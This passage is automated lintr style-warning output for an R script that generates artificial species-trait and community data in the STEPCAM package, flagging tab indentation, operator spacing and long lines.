~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       